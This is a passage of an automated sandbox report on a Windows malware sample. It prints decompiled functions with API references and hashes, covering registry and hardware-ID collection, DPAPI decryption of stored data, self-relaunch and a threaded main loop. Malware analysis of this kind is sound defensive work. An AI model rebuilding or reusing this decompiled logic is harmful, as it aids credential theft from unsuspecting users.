					RegQueryValueExA(_v8, _t19, 0, 0, _v16,  &_v12);
				}
				RegCloseKey(_v8);
				return _v16;
			}

0x0040af86
0x0040afa1
0x0040afaf
0x0040afc3
0x0040afd1
0x0040afdc
0x0040afdc
0x0040afe6
0x0040aff2

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040AF94
RtlAllocateHeap.NTDLL(00000000), ref: 0040AF9B
RegOpenKeyExA.ADVAPI32(80000002,006226A0,00000000,00020119,?), ref: 0040AFBB
RegQueryValueExA.ADVAPI32(?,00628C00,00000000,00000000,?,000000FF), ref: 0040AFDC
RegCloseKey.ADVAPI32(?), ref: 0040AFE6

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 14f82c3a1c4a03ad05b10c880fed87cc913976545a251b3981974c41da736b85
Instruction ID: 3560b0945dc9351a47cb67e23b673332a76d6e647168765e51ac926b13a32b36
Opcode Fuzzy Hash: 14f82c3a1c4a03ad05b10c880fed87cc913976545a251b3981974c41da736b85
Instruction Fuzzy Hash: 19014FB5A41208BFEB00DBE0DD49FEEB7BCEB48700F108569FA05A7291D6745A60CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0040B2C0, Relevance: 7.5, APIs: 5, Instructions: 30
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040B2C0() {
				struct tagHW_PROFILE_INFOA _v132;
				void* _v136;

				if(GetCurrentHwProfileA( &_v132) == 0) {
					return 0x4191a0;
				}
				_v136 = RtlAllocateHeap(GetProcessHeap(), 0, 0x64);
				memset(_v136, 0, 4);
				 *0x41aa24(_v136,  &(_v132.szHwProfileGuid));
				return _v136;
			}

0x0040b2d5
0x00000000
0x0040b31a
0x0040b2e8
0x0040b2f9
0x0040b30a
0x00000000

APIs

GetCurrentHwProfileA.ADVAPI32(?), ref: 0040B2CD
GetProcessHeap.KERNEL32(00000000,00000064), ref: 0040B2DB
RtlAllocateHeap.NTDLL(00000000), ref: 0040B2E2
memset.NTDLL ref: 0040B2F9
lstrcat.KERNEL32(?,?), ref: 0040B30A

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: Heap$AllocateCurrentProcessProfilelstrcatmemset
String ID:
API String ID: 4122951905-0
Opcode ID: 715a3ee425a4e0458906170b038f95fce73c32c5e13b901f43c8444701ff9b20
Instruction ID: 53f97c33c887665c50d9d4951fdbbfd19b7c782c8dc218844e441fa5d8454051
Opcode Fuzzy Hash: 715a3ee425a4e0458906170b038f95fce73c32c5e13b901f43c8444701ff9b20
Instruction Fuzzy Hash: 8FF05470A012099BDB20ABA4DD09B9977BCFB44701F008565FB45D7281DB359951CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004124F0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004124F0(intOrPtr __ecx, void* _a4, char _a8) {
				int _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;

				_v20 = __ecx;
				if( *((intOrPtr*)(_v20 + 0x84)) == 0) {
					if( *(_v20 + 0x7c) == 0) {
						 *((intOrPtr*)(_v20 + 0x14)) = 0x1000000;
						return 0;
					}
					_t42 =  &_v16; // 0x412876
					_t43 =  &_a8; // 0x412876
					_v12 = ReadFile( *(_v20 + 0x7c), _a4,  *_t43, _t42, 0);
					if(_v12 != 0) {
						_t51 =  &_v16; // 0x412876
						 *((intOrPtr*)(_v20 + 0x74)) =  *((intOrPtr*)(_v20 + 0x74)) +  *_t51;
						_t54 =  &_v16; // 0x412876
						 *((intOrPtr*)(_v20 + 0x78)) = E00411280( *((intOrPtr*)(_v20 + 0x78)), _a4,  *_t54);
						_t60 =  &_v16; // 0x412876
						return  *_t60;
					}
					return 0;
				}
				if( *((intOrPtr*)(_v20 + 0x8c)) <  *((intOrPtr*)(_v20 + 0x88))) {
					_v8 =  *((intOrPtr*)(_v20 + 0x88)) -  *((intOrPtr*)(_v20 + 0x8c));
					_t14 =  &_a8; // 0x412876
					if(_v8 >  *_t14) {
						_t15 =  &_a8; // 0x412876
						_v8 =  *_t15;
					}
					memcpy(_a4,  *((intOrPtr*)(_v20 + 0x84)) +  *((intOrPtr*)(_v20 + 0x8c)), _v8);
					 *((intOrPtr*)(_v20 + 0x8c)) =  *((intOrPtr*)(_v20 + 0x8c)) + _v8;
					 *((intOrPtr*)(_v20 + 0x74)) =  *((intOrPtr*)(_v20 + 0x74)) + _v8;
					 *((intOrPtr*)(_v20 + 0x78)) = E00411280( *((intOrPtr*)(_v20 + 0x78)), _a4, _v8);
					return _v8;
				}
				return 0;
			}

0x004124f6
0x00412503
0x004125b7
0x00412617
0x00000000
0x0041261e
0x004125bb
0x004125bf
0x004125d4
0x004125db
0x004125e7
0x004125ed
0x004125f0
0x0041260a
0x0041260d
0x00000000
0x0041260d
0x00000000
0x004125dd
0x0041251b
0x00412536
0x0041253c
0x0041253f
0x00412541
0x00412544
0x00412544
0x00412562
0x00412577
0x00412589
0x004125a6
0x00000000
0x004125a9
0x00000000

APIs

memcpy.NTDLL(?,?,00004000,?,00412876,?,00004000), ref: 00412562
ReadFile.KERNEL32(00000000,?,v(A,v(A,00000000,?,00412876,?,00004000), ref: 004125CE

Strings

v(A, xrefs: 004125BB, 004125E7, 004125F0, 0041260D, 004125BE, 004125F3
v(A, xrefs: 004125BF, 0041253C, 00412541, 004125C2

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: FileReadmemcpy
String ID: v(A$v(A
API String ID: 1163090680-3205644266
Opcode ID: 7275ca954cdc286a3f8e939b103dc98b6529853cd61c34709e59e34097809bab
Instruction ID: 57ccbe00efff64c7029569c4514cc3a27c1a1315352579a716a79c0d7299f08d
Opcode Fuzzy Hash: 7275ca954cdc286a3f8e939b103dc98b6529853cd61c34709e59e34097809bab
Instruction Fuzzy Hash: 5641BAB5A00119EFCB44CF94C980EEEB7B6BF48304F108569E429D7351D735E951DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040BFA0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040BFA0(void* __ecx) {
				struct HINSTANCE__* _v32;
				struct HINSTANCE__* _v36;
				struct HINSTANCE__* _v40;
				CHAR* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				struct HINSTANCE__* _v56;
				struct HINSTANCE__* _v60;
				char _v64;
				char _v332;
				char _v596;
				CHAR* _t37;
				intOrPtr _t38;
				intOrPtr _t43;

				E0040B720( &_v596, 0x104);
				E0040B720( &_v332, 0x104);
				GetModuleFileNameA(0,  &_v332, 0x104);
				_t37 =  *0x41a2c4; // 0x62adb8
				wsprintfA( &_v596, _t37,  &_v332);
				E0040B6E0(_t37,  &_v64, 0, 0x3c);
				_v64 = 0x3c;
				_v60 = 0;
				_v56 = 0;
				_t38 =  *0x41a694; // 0x622cd0
				_v52 = _t38;
				_t43 =  *0x41a770; // 0x6271a0
				_v48 = _t43;
				_v44 =  &_v596;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				 *0x41aa84( &_v64);
				E0040B720( &_v64, 0x3c);
				E0040B720( &_v596, 0x104);
				return E0040B720( &_v332, 0x104);
			}

0x0040bfb5
0x0040bfc6
0x0040bfd9
0x0040bfe6
0x0040bff4
0x0040c005
0x0040c00a
0x0040c011
0x0040c018
0x0040c01f
0x0040c025
0x0040c028
0x0040c02e
0x0040c037
0x0040c03a
0x0040c041
0x0040c048
0x0040c053
0x0040c05f
0x0040c070
0x0040c089

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000104,?,00000104), ref: 0040BFD9
wsprintfA.USER32 ref: 0040BFF4
ShellExecuteEx.SHELL32(0000003C), ref: 0040C053

Strings

<, xrefs: 0040C00A

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: ExecuteFileModuleNameShellwsprintf
String ID: <
API String ID: 690967290-4251816714
Opcode ID: 0d3fa1aa40dd4b54a01f72a3a6220bdd8af4e0c74f435e2c109b568a61a03135
Instruction ID: b6c0095fef0d0179f9846f7a94a4eacab4548b86fc187f3e8670100f81996cfc
Opcode Fuzzy Hash: 0d3fa1aa40dd4b54a01f72a3a6220bdd8af4e0c74f435e2c109b568a61a03135
Instruction Fuzzy Hash: 5D21EDB1900208ABDB14EFA0DC89FDEB778EB48705F00456AF214B61D1DBB95648CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004120F0, Relevance: 6.1, APIs: 4, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004120F0(intOrPtr __ecx, void* _a4, long _a8) {
				long _v8;
				intOrPtr _v12;
				struct _FILETIME _v20;
				signed short _v24;
				signed short _v28;
				struct _SYSTEMTIME _v44;
				intOrPtr _v48;
				intOrPtr _t88;
				intOrPtr _t89;
				intOrPtr _t115;
				intOrPtr _t117;
				long _t130;
				intOrPtr _t131;
				intOrPtr _t132;

				_v48 = __ecx;
				 *(_v48 + 0x7c) = 0;
				 *(_v48 + 0x84) = 0;
				 *((char*)(_v48 + 0x80)) = 0;
				 *(_v48 + 0x78) = 0;
				 *(_v48 + 0x70) = 0;
				 *(_v48 + 0x90) = 0;
				 *(_v48 + 0x74) = 0;
				if(_a4 == 0 || _a4 == 0xffffffff) {
					return 0x10000;
				} else {
					_v8 = SetFilePointer( *(_v48 + 4), 0, 0, 1);
					if(_v8 == 0xffffffff) {
						 *((intOrPtr*)(_v48 + 0x4c)) = 0x80000000;
						 *(_v48 + 0x70) = 0xffffffff;
						if(_a8 != 0) {
							 *(_v48 + 0x70) = _a8;
						}
						 *((char*)(_v48 + 0x6c)) = 0;
						GetLocalTime( &_v44);
						SystemTimeToFileTime( &_v44,  &_v20);
						_t130 = _v20.dwLowDateTime;
						E00411670(_t130, _v20.dwHighDateTime,  &_v28,  &_v24);
						_t88 = E00411630(_v20.dwLowDateTime, _v20.dwHighDateTime);
						_t115 = _v48;
						 *((intOrPtr*)(_t115 + 0x50)) = _t88;
						 *(_t115 + 0x54) = _t130;
						_t131 = _v48;
						_t89 = _v48;
						 *((intOrPtr*)(_t131 + 0x58)) =  *((intOrPtr*)(_t89 + 0x50));
						 *((intOrPtr*)(_t131 + 0x5c)) =  *((intOrPtr*)(_t89 + 0x54));
						_t117 = _v48;
						_t132 = _v48;
						 *((intOrPtr*)(_t117 + 0x60)) =  *((intOrPtr*)(_t132 + 0x50));
						 *((intOrPtr*)(_t117 + 0x64)) =  *((intOrPtr*)(_t132 + 0x54));
						 *(_v48 + 0x68) = _v24 & 0x0000ffff | (_v28 & 0x0000ffff) << 0x00000010;
						 *(_v48 + 0x7c) = _a4;
						return 0;
					}
					_v12 = E00411720(_a4, _v48 + 0x4c, _v48 + 0x70, _v48 + 0x50, _v48 + 0x68);
					if(_v12 == 0) {
						SetFilePointer(_a4, 0, 0, 0);
						 *((char*)(_v48 + 0x6c)) = 1;
						 *(_v48 + 0x7c) = _a4;
						return 0;
					}
					return _v12;
				}
			}

0x004120f6
0x004120fc
0x00412106
0x00412113
0x0041211d
0x00412127
0x00412131
0x0041213e
0x00412149
0x00000000
0x0041215b
0x0041216e
0x00412175
0x004121df
0x004121e9
0x004121f4
0x004121fc
0x004121fc
0x00412202
0x0041220a
0x00412218
0x0041222a
0x0041222e
0x0041223e
0x00412246
0x00412249
0x0041224c
0x0041224f
0x00412252
0x00412258
0x0041225e
0x00412261
0x00412264
0x0041226a
0x00412270
0x00412283
0x0041228c
0x00000000
0x0041228f
0x0041219f
0x004121a6
0x004121ba
0x004121c3
0x004121cd
0x00000000
0x004121d0
0x00000000
0x004121a8

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,00412ADE,?,?), ref: 00412168
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00412ADE), ref: 004121BA

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: bd9446f4783b8dd7e6d95fa0f5fa15532bd816b395c3834064200ff55a53ee91
Instruction ID: 73fee1c067eb70601bd9df8ab8ea40709189a789a85f05da52033877ad893135
Opcode Fuzzy Hash: bd9446f4783b8dd7e6d95fa0f5fa15532bd816b395c3834064200ff55a53ee91
Instruction Fuzzy Hash: 4A51D7749002099FDB04DFA8C484BDEBBB5BB4C304F14C15AE925AB391D775A986CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00411DB0, Relevance: 6.1, APIs: 4, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411DB0(intOrPtr __ecx, void* _a4, signed int _a8) {
				void* _v8;
				struct _OVERLAPPED* _v12;
				long _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				signed char _t101;
				void* _t102;
				intOrPtr _t110;
				intOrPtr _t113;
				intOrPtr _t128;
				intOrPtr _t131;
				void* _t148;

				_v28 = __ecx;
				_v8 = _a4;
				if(( *(_v28 + 0x2d) & 0x000000ff) == 0) {
					L11:
					_t110 = _v28;
					__eflags =  *((intOrPtr*)(_t110 + 0x20));
					if( *((intOrPtr*)(_t110 + 0x20)) == 0) {
						_t128 = _v28;
						__eflags =  *((intOrPtr*)(_t128 + 4));
						if( *((intOrPtr*)(_t128 + 4)) == 0) {
							 *((intOrPtr*)(_v28 + 0x14)) = 0x1000000;
							__eflags = 0;
							return 0;
						}
						WriteFile( *(_v28 + 4), _v8, _a8,  &_v16, 0);
						return _v16;
					}
					_t131 = _v28;
					_t113 = _v28;
					__eflags =  *((intOrPtr*)(_t131 + 0x24)) + _a8 -  *((intOrPtr*)(_t113 + 0x28));
					if( *((intOrPtr*)(_t131 + 0x24)) + _a8 <  *((intOrPtr*)(_t113 + 0x28))) {
						memcpy( *((intOrPtr*)(_v28 + 0x20)) +  *((intOrPtr*)(_v28 + 0x24)), _v8, _a8);
						 *((intOrPtr*)(_v28 + 0x24)) =  *((intOrPtr*)(_v28 + 0x24)) + _a8;
						return _a8;
					}
					 *((intOrPtr*)(_v28 + 0x14)) = 0x30000;
					return 0;
				}
				if( *(_v28 + 0x3c) != 0 &&  *((intOrPtr*)(_v28 + 0x40)) < _a8) {
					_v20 =  *(_v28 + 0x3c);
					E0040B5B0(_v20);
					_t148 = _t148 + 4;
					 *(_v28 + 0x3c) = 0;
				}
				_t117 = _v28;
				if( *(_v28 + 0x3c) == 0) {
					_t102 = E0040B590(_t117, _a8 << 1);
					_t148 = _t148 + 4;
					_v24 = _t102;
					 *(_v28 + 0x3c) = _v24;
					 *((intOrPtr*)(_v28 + 0x40)) = _a8;
				}
				memcpy( *(_v28 + 0x3c), _a4, _a8);
				_v12 = 0;
				while(1) {
					_t154 = _v12 - _a8;
					if(_v12 >= _a8) {
						break;
					}
					_t101 = E004114E0( *( *(_v28 + 0x3c) + _v12) & 0x000000ff, _t154, _v28 + 0x30,  *( *(_v28 + 0x3c) + _v12) & 0x000000ff);
					_t148 = _t148 + 8;
					 *( *(_v28 + 0x3c) + _v12) = _t101;
					_v12 =  &(_v12->Internal);
				}
				_v8 =  *(_v28 + 0x3c);
				goto L11;
			}

0x00411db6
0x00411dbc
0x00411dc8
0x00411e90
0x00411e90
0x00411e93
0x00411e97
0x00411ee9
0x00411eec
0x00411ef0
0x00411f15
0x00411f1c
0x00000000
0x00411f1c
0x00411f07
0x00000000
0x00411f0d
0x00411e99
0x00411ea2
0x00411ea5
0x00411ea8
0x00411ecd
0x00411edf
0x00000000
0x00411ee2
0x00411ead
0x00000000
0x00411eb4
0x00411dd5
0x00411de8
0x00411def
0x00411df4
0x00411dfa
0x00411dfa
0x00411e01
0x00411e08
0x00411e10
0x00411e15
0x00411e18
0x00411e21
0x00411e2a
0x00411e2a
0x00411e3c
0x00411e42
0x00411e54
0x00411e57
0x00411e5a
0x00000000
0x00000000
0x00411e71
0x00411e76
0x00411e82
0x00411e51
0x00411e51
0x00411e8d
0x00000000

APIs

new[].LIBCMTD ref: 00411E10
memcpy.NTDLL(00000000,?,000000FF,?,0041289D,?,000000FF,?,00004000), ref: 00411E3C
memcpy.NTDLL(00000000,00004000,000000FF,?,0041289D,?,000000FF,?,00004000), ref: 00411ECD

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: memcpy$new[]
String ID:
API String ID: 3541104900-0
Opcode ID: e6a56af37c6e19b6ed2c0ea83cdf516621f6fac75bc61e6ebff01ec4e90410b0
Instruction ID: 1be85da1f02f000736658b6362af722e2e86620b20a10b8620c900d99ce7c40f
Opcode Fuzzy Hash: e6a56af37c6e19b6ed2c0ea83cdf516621f6fac75bc61e6ebff01ec4e90410b0
Instruction Fuzzy Hash: 0051C7B8A00209DFCB44CF98C581EAEBBB6FF88314F548159EA05AB355D735E981CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00407690, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00407690(CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				char* _v8;
				char _v12;
				char _v16;
				char* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char* _t57;
				intOrPtr _t58;

				_v44 = 0;
				if(E00407380(_a4,  &_v40,  &_v16) != 0) {
					_v8 = E0040BB00(_v40, _v16);
					if(_v8 != 0) {
						_t57 =  *0x41a088; // 0x6281a0
						_v20 = StrStrA(_v8, _t57);
						if(_v20 != 0) {
							_v20 = _v20 + 0x10;
							_t58 =  *0x41a394; // 0x627b30
							_v48 = E0040BA20(_v20, _t58);
							if(E00407470( &_v24, _v48,  &_v32,  &_v24) != 0 && _v24 >= 5) {
								asm("repe cmpsb");
								if(0 == 0 && E00407510(_v32 + 5, _v24 - 5,  &_v28,  &_v12) != 0 && _v12 == 0x20) {
									_v44 = 1;
									E004075E0(_v28, _a8, _a12);
								}
							}
						}
					}
				}
				return _v44;
			}

0x00407698
0x004076b5
0x004076cb
0x004076d2
0x004076d8
0x004076e9
0x004076f0
0x004076fc
0x004076ff
0x00407712
0x0040772b
0x00407742
0x00407744
0x0040776e
0x00407781
0x00407786
0x00407744
0x0040772b
0x004076f0
0x004076d2
0x00407791

APIs

Part of subcall function 00407380: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,004076B0,00000000,?), ref: 004073A7
Part of subcall function 00407380: GetFileSizeEx.KERNEL32(000000FF,004076B0,?,004076B0,00000000,?), ref: 004073CC
Part of subcall function 00407380: LocalAlloc.KERNEL32(00000040,?,?,004076B0), ref: 004073EC
Part of subcall function 00407380: ReadFile.KERNEL32(000000FF,?,000000FF,?,00000000,?,004076B0), ref: 00407415
Part of subcall function 00407380: LocalFree.KERNEL32(?), ref: 0040744B
Part of subcall function 00407380: CloseHandle.KERNEL32(000000FF,?,004076B0,00000000,?), ref: 00407455

Part of subcall function 0040BB00: LocalAlloc.KERNEL32(00000040,-00000001), ref: 0040BB22

StrStrA.SHLWAPI(00000000,006281A0), ref: 004076E3

Part of subcall function 00407470: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,&w@,00000000,00000000), ref: 0040749F
Part of subcall function 00407470: LocalAlloc.KERNEL32(00000040,?,?,00407726,?,?), ref: 004074B1
Part of subcall function 00407470: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,&w@,00000000,00000000), ref: 004074DA
Part of subcall function 00407470: LocalFree.KERNEL32(?,?,?,00407726,?,?), ref: 004074EF

Part of subcall function 00407510: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00407534
Part of subcall function 00407510: LocalAlloc.KERNEL32(00000040,00000000), ref: 00407553
Part of subcall function 00407510: LocalFree.KERNEL32(?), ref: 0040757F

Strings

0{b, xrefs: 004076FF
, xrefs: 00407768
DPAPI, xrefs: 00407738

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotect
String ID: $0{b$DPAPI
API String ID: 2403763606-1445951701
Opcode ID: ab39210f1f30a146a8667208f0ce05bb118fbd5d0286aae0401707350fdae64b
Instruction ID: eb4e9db67b04358953b965a2fa42df4c86bf95490415688a64744a127192de17
Opcode Fuzzy Hash: ab39210f1f30a146a8667208f0ce05bb118fbd5d0286aae0401707350fdae64b
Instruction Fuzzy Hash: C5314876D04109ABCF04DBD9DC45AFFB7B8AF48304F14852AE904B3241E738B944CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040BEB0, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 53
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040BEB0(char* _a4, char* _a8, intOrPtr _a12) {
				char* _v8;
				char* _v12;
				char* _v16;
				char _v17;
				intOrPtr _v24;

				_v8 = StrStrA(_a4, _a8);
				if(_v8 != 0) {
					 *0x41a994(0x41ac88, _a4, _v8 - _a4);
					 *(_v8 - _a4 + 0x41ac88) = 0;
					_v12 = _a8;
					_v16 =  &(_v12[1]);
					do {
						_v17 =  *_v12;
						_v12 =  &(_v12[1]);
					} while (_v17 != 0);
					_v24 = _v12 - _v16;
					wsprintfA(_v8 - _a4 + 0x41ac88, "%s%s", _a12, _v8 + _v24);
					return 0x41ac88;
				}
				return _a4;
			}

0x0040bec4
0x0040becb
0x0040bee2
0x0040beee
0x0040bef8
0x0040bf01
0x0040bf04
0x0040bf09
0x0040bf0c
0x0040bf10
0x0040bf1c
0x0040bf3b
0x00000000
0x0040bf44
0x00000000

APIs

StrStrA.SHLWAPI(006276C8,?,?,004061B1,?,006276C8,00000000), ref: 0040BEBE
lstrcpyn.KERNEL32(0041AC88,006276C8,006276C8,?,004061B1,?,006276C8), ref: 0040BEE2
wsprintfA.USER32 ref: 0040BF3B

Strings

%s%s, xrefs: 0040BF2A

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: lstrcpynwsprintf
String ID: %s%s
API String ID: 1799455324-3252725368
Opcode ID: 968c324a661e519957af98edf49b8511bb81e06ad5647acdf799b48dea5bf767
Instruction ID: 9d0df258c1970b53338195e9cfc72265299fee085df88f93dfbf2dd1b14f7860
Opcode Fuzzy Hash: 968c324a661e519957af98edf49b8511bb81e06ad5647acdf799b48dea5bf767
Instruction Fuzzy Hash: 3A21F975901108FFDF05DFACC984AEEBBB4EF48344F108199E909A7341D735AA90CB9A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 86C4.exe PID: 1368 Parent PID: 3424 86C4.exeCOMMON

Executed Functions

Function 00409A6B, Relevance: 98.8, APIs: 48, Strings: 8, Instructions: 799
stringsleepregistryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			_entry_(CHAR* _a12, void* _a15) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				char _v28;
				char _v32;
				union _GET_FILEEX_INFO_LEVELS _v36;
				CHAR* _v40;
				char _v44;
				char _v48;
				struct _PROCESS_INFORMATION _v64;
				char _v80;
				char _v112;
				char _v371;
				char _v372;
				char _v671;
				char _v672;
				char _v704;
				struct _STARTUPINFOA _v772;
				char _v1271;
				char _v1272;
				char _v1672;
				char _t238;
				long _t239;
				char _t242;
				long _t244;
				CHAR* _t248;
				char _t250;
				intOrPtr _t257;
				char _t267;
				intOrPtr* _t272;
				char _t276;
				char _t279;
				char _t282;
				char _t283;
				void* _t284;
				char _t294;
				CHAR* _t303;
				int _t304;
				char _t309;
				CHAR* _t312;
				char _t318;
				int _t324;
				CHAR* _t325;
				char _t328;
				char* _t331;
				char _t332;
				char _t340;
				char _t344;
				CHAR* _t357;
				CHAR* _t358;
				int _t359;
				int _t373;
				long _t376;
				long _t379;
				void* _t383;
				void* _t396;
				void* _t401;
				char _t402;
				char _t403;
				intOrPtr* _t410;
				void* _t411;
				char _t417;
				char _t418;
				void* _t424;
				intOrPtr _t426;
				void* _t428;
				char* _t436;
				intOrPtr _t441;
				CHAR* _t442;
				void* _t450;
				void* _t451;
				char _t459;
				void* _t464;
				void* _t465;
				void* _t467;
				void* _t468;
				void* _t469;
				void* _t470;
				void* _t471;
				void* _t474;
				intOrPtr _t475;

				SetErrorMode(3); // executed
				SetErrorMode(3); // executed
				SetUnhandledExceptionFilter(E00406511); // executed
				E0040EC54(); // executed
				_t475 =  *0x41201f; // 0x0
				if(_t475 != 0) {
					__eflags =  *0x4133d8;
					if(__eflags == 0) {
						L126:
						CreateThread(0, 0, E0040405E, 0, 0, 0);
						__imp__#115(0x1010,  &_v1672);
						E0040E52E(_t449, __eflags);
						E0040EAAF(1, 0);
						E00401D96(_t438, 0x412118);
						E004080C9(_t438);
						CreateThread(0, 0, E0040877E, 0, 0, 0);
						E00405E6C(__eflags);
						E00403132();
						E0040C125(__eflags);
						E00408DB1(_t438);
						Sleep(0xbb8);
						E0040C4EE();
						while(1) {
							__eflags =  *0x4133d0;
							if( *0x4133d0 == 0) {
								goto L129;
							}
							_t239 = GetTickCount();
							__eflags = _t239 -  *0x4133d0 - 0x186a0;
							if(_t239 -  *0x4133d0 < 0x186a0) {
								L131:
								Sleep(0x2710);
								continue;
							}
							L129:
							_t238 = E0040C913();
							__eflags = _t238;
							if(_t238 == 0) {
								 *0x4133d0 = GetTickCount();
							}
							goto L131;
						}
					}
					_a12 = 0xa;
					while(1) {
						_t242 = DeleteFileA(0x4133d8);
						__eflags = _t242;
						if(_t242 != 0) {
							break;
						}
						__eflags = _a12;
						if(_a12 <= 0) {
							break;
						}
						_t244 = GetLastError();
						__eflags = _t244 - 2;
						if(_t244 == 2) {
							break;
						}
						_t219 =  &_a12;
						 *_t219 = _a12 - 1;
						__eflags =  *_t219;
						Sleep(0x3e8);
					}
					E0040EE2A(_t438, 0x4133d8, 0, 0x104);
					_t465 = _t465 + 0xc;
					goto L126;
				} else {
					_v12 = 0;
					if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) == 0) {
						_v672 = 0;
					}
					if(_v672 == 0x22) {
						E0040EF00( &_v672,  &_v671);
						_t436 = E0040ED23( &_v672, 0x22);
						_t465 = _t465 + 0x10;
						if(_t436 != 0) {
							 *_t436 = 0;
						}
					}
					_t248 = GetCommandLineA();
					_t459 = 0x4122f8;
					_a12 = _t248;
					_t250 = E0040EE95(_a12, E00402544(0x4122f8, 0x410a48, 4, 0xe4, 0xc8));
					_t454 = 0x100;
					_v8 = _t250;
					E0040EE2A(_t438, 0x4122f8, 0, 0x100);
					_t467 = _t465 + 0x28;
					if(_v8 == 0) {
						_t257 = E004096AA( &_v672,  &_v48,  &_v44,  &_v372,  &_v112); // executed
						_t467 = _t467 + 0x14;
						_v16 = _t257;
						if(_t257 == 0) {
							E0040EF00(0x4121a8,  &_v672);
							_pop(_t438);
							_a12 = GetCommandLineA();
							_v8 = E0040EE95(_a12, E00402544(0x4122f8, 0x410a38, 4, 0xe4, 0xc8));
							E0040EE2A(_t438, 0x4122f8, 0, 0x100);
							_t468 = _t467 + 0x28;
							__eflags = _v8;
							if(_v8 == 0) {
								L102:
								_v8 = E0040EE95(_a12, E00402544(_t459, 0x410a28, 4, 0xe4, 0xc8));
								E0040EE2A(_t438, _t459, 0, _t454);
								_t467 = _t468 + 0x28;
								__eflags = _v8;
								if(_v8 == 0) {
									L110:
									_t267 = E00406EC3();
									__eflags = _t267;
									if(_t267 != 0) {
										E004098F2(_t438);
										L19:
										ExitProcess(0); // executed
									}
									__eflags = _v372;
									if(_v372 == 0) {
										L116:
										 *0x4133b0 = 0;
										L117:
										_v64.hProcess =  &_v372;
										_v64.hThread = E00409961;
										_v64.dwProcessId = 0;
										_v64.dwThreadId = 0;
